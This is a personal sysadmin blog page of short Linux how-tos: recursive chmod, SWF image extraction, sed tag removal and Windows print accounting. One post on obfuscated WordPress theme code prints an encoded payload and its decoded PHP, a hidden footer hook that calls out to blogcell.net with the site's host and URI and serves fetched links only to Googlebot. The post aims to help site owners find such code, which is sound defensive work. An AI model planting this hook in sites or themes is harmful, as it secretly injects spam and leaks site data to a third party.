15 Sep 2009 chmod only files or folders
This post is just a personal note on how to chmod files or directories recursively
Recursive chmod only files within this folder
find . -type f -exec chmod 0600 {} ;
Recursive chmod only folders within this folder
find . -type d -exec chmod 0755 {} ;
Posted by Hans-Henry Jakobsen
24 Jun 2009 Howto decompose a SWF Adobe Flash file
This post describes howto decompose a SWF Flash-file using linux and a program named swfextract. The post came to life because I had to do some changes to one of my flash presentations but I had deleted all the source files. After searching the Internet i doscovered swfextract.
SWF Tools is a collection of SWF (Flash) manipulation and creation utilities like pdf2swf, jpeg2swf, png2swf, gif2swf, font2swf, wav2swf, swfcombine, swfdump, swfstrings, swfbbox and swfc. But I’m only going to use swfextract in this post.
If you don’t have it installed on your system, download it and install the deb-package
# wget http://http.us.debian.org/debian/pool/main/s/swftools/swftools_0.8.1-2.1_i386.deb # dpkg -i swftools_0.8.1-2.1_i386.deb
The swftools package depends on several packages like libgif4 libt1-5 and they should be installed before swftools
# aptitude install libgif4 libt1-5
I was interested in extracting the image files in my Flash presentation and did the following to determine what was in the presentation file
# swfextract flashfile.swf Objects in file flashfile.swf: [-i] 5 Shapes: ID(s) 1, 3, 5, 7, 9 [-j] 4 JPEGs: ID(s) 2, 6, 8, 10 [-f] 1 Frame: ID(s) 0
As we see above there are 4 JPEG-files I'm interested in extracting and their IDs.
I did the following to extract the image files
# swfextract -i 2 -j 2,6,8,10 flashfile.swf
Result files
output.swf pic10.jpg pic2.jpg pic6.jpg pic8.jpg
If you don't use the -i switch you will end up with only one output.jpg file.
You are now ready to recreate the Flash presentation using the extracted image files.
Source
http://www.swftools.org
SWF Tools
Tags: adobe, decompose, extract, Flash, howto, SWF, swfextract
Posted by Hans-Henry Jakobsen
12 Jun 2009 Replace specific HTML tags using sed and regular expression
In this post I would like to replace all <embed> HTML tags in a HTML file with a <strong> tag.
# sed -e 's/<embed[^>]*>/<strong>/g' filename.html > newfile.html
And if you would like to remove the <embed> tag altogether
# sed -e 's/<embed[^>]*>//g' filename.html > newfile.html
To remove all HTML tags in a file
# sed -e 's/<[^>]*>//g' filename.html > newfile.html
The result file newfile.html is now without any < HTML tags >.
Tags: html, regexp, replace, sed
Posted by Hans-Henry Jakobsen
22 May 2009 WordPress themes with eval and base64_decode lines
Lately I’ve been downloading and reading myself up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1
eval(base64_decode('abcdefgh....')
and other variations like
Example 2
eval(gzinflate(str_rot13(base64_decode('abcdefgh...')
This made me curious about why would someone make such an effort to obfuscate their code. Personally I would like to know what code my themes are running so it was not an option not to decode these eval lines in my WordPress themes. This made me wonder if many of my themes that had these lines of code and a simple command from the console would reveal all my themes that had encoded code from the wp-content/themes katalog on your WordPress installation
grep eval |grep decode | grep php * -R
I had several themes containing code of hiding code and some of the themes had hacks that made traffic redirects to other sites.
Decoding Example 1 can be performed by using the following script and inserting the encrypted text in variable $a.
The PHP decoder script
The encrypted text is taken from a unnamed random theme I have downloaded.
<?php
$a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7';
function a($a){ return base64_decode($a);}
while(!$b){
if(substr($a,0,4) == 'eval' || !$count){
$a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a);
$count++;
}else
$b = true;
}
echo $a;
?>
To run it from a console window you can do the following, not as a privileged user in case it does something nasty.
php scriptname.php > result.txt
My text would output the following text to the result.txt file
function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get = '/wpam/';$adwb_soc = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' HERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
}
add_action("wp_footer", "wp_get_footer_meta");
You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes are doing this to hide their WordPress theme tricks while other do it to do nasty stuff like redirecting traffic from your site to other sites, etc.
Source: The decoder script was found here
Tags: base64_decode, eval, gzinflate, PHP, str_rot13, Wordpress, Wordpress theme
Posted by Hans-Henry Jakobsen
15 May 2009 Simple Windows Print Accounting using Event Viewer data
This post continues where my previous post titled Export events including Event Properties from Windows Event Viewer left off.
The data I’m going to work with was exported using eventquery.vbs and saved in a CSV-file, comma separated file and it is presented in the form shown below.
"Information","10","12.05.2009 13:24:48","Print","Servername","None","AD\username","Document 232, filename.pdf owned by username was printed on printername via port IP_192.168.0.254. Size in bytes: 279232; pages printed: 18"
I’m interested in the username, date/time printed and pages printed and will now show how I’ve accomplished that using some simple linux console commands.
awk -F, '{print $7 " " $3 " " $4 " " $NF}' Event_Viewer_System.csv | grep printername | awk '{print $1 "," $2 "," $3 "," $NF}' | sed 's/\"//g'|sort > PrintAccounting.csv
Result
username,14.05.2009,12:58:41,18 username,15.05.2009,09:24:13,2 username,15.05.2009,09:25:00,37 username,15.05.2009,09:30:03,2 username,15.05.2009,09:30:29,2 ...
Where the fields contain username, date, time and the amount of printed pages.
A short description on whats being done
- print out column 7, 3, 4 and last column where the separator is a comma (,) from the file Event_Viewer_System.csv
- filter out the printer you are interested in
- filter out again the data we are interested in
- remove quote sign (“) from the list
- sort the list ny username
- redirect the output to a file
And that’s how you make a primitive print accounting system from data gathered in a Windows Server.
This particular example has been testen on data from a Windows 2003 Server, but I think it can be performed on other versions of Windows as well.
Tags: csv, Event Properties, Event Viewer, eventquery.vbs
Posted by Hans-Henry Jakobsen
